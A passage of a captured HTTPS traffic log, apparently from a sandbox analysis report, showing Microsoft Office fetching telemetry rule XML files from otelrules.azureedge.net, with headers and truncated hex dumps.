                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:46 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            130192.168.2.56200013.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:46 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:47 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:46 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1362
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BEB256F43"
                                                                                                                                                                                                                            x-ms-request-id: 4c089dbd-801e-00ac-235c-2efd65000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133946Z-15869dbbcc6bdtw9hC1DFWqyfw00000001pg00000000e0n0
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:47 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            131192.168.2.56200613.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:47 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:47 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:47 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                                                                            x-ms-request-id: e9a4e3c9-201e-005d-135c-2eafb3000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133947Z-15869dbbcc68l9dbhC1DFWc5xw00000001h0000000009vtg
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:47 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            132192.168.2.56200413.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:47 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:47 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:47 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                                                                            x-ms-request-id: 0b0dd1c9-501e-0016-2958-2e181b000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133947Z-17df447cdb5w28bthC1DFWgb6400000002mg00000000e2yv
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:47 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            133192.168.2.56200513.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:47 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:47 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:47 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1399
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE976026E"
                                                                                                                                                                                                                            x-ms-request-id: 898deafb-901e-0048-35d2-2cb800000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133947Z-16547b76f7fnlcwwhC1DFWz6gw00000006wg000000003b4t
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:47 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            134192.168.2.56200713.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:47 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:47 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:47 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1362
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                                                                            x-ms-request-id: 996d7559-c01e-0079-635c-2ee51a000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133947Z-17df447cdb5km9skhC1DFWy2rc00000002zg000000009a7c
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:47 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            135192.168.2.56200913.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:48 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:48 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:48 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1388
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                                                                            x-ms-request-id: 9314d3eb-501e-00a3-0555-2ec0f2000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133948Z-17df447cdb5c6d7phC1DFWuq9s00000002ug00000000dpe7
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:48 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            136192.168.2.56201013.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:48 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:48 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:48 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1415
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                                                                            x-ms-request-id: f75e4c15-501e-0047-0155-2ece6c000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133948Z-17df447cdb5fzdpxhC1DFWdd3400000002y0000000002av1
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:48 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            137192.168.2.56200813.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:48 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:48 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:48 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1425
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                                                                            x-ms-request-id: 0401437a-901e-0015-114b-2eb284000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133948Z-15869dbbcc6khw88hC1DFWh5f400000007a00000000008rm
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:48 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            138192.168.2.56201113.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:48 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:48 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:48 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1378
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BDB813B3F"
                                                                                                                                                                                                                            x-ms-request-id: 71af9553-101e-00a2-14d2-2c9f2e000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133948Z-16547b76f7f7rtshhC1DFWrtqn00000006ug000000002dmc
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
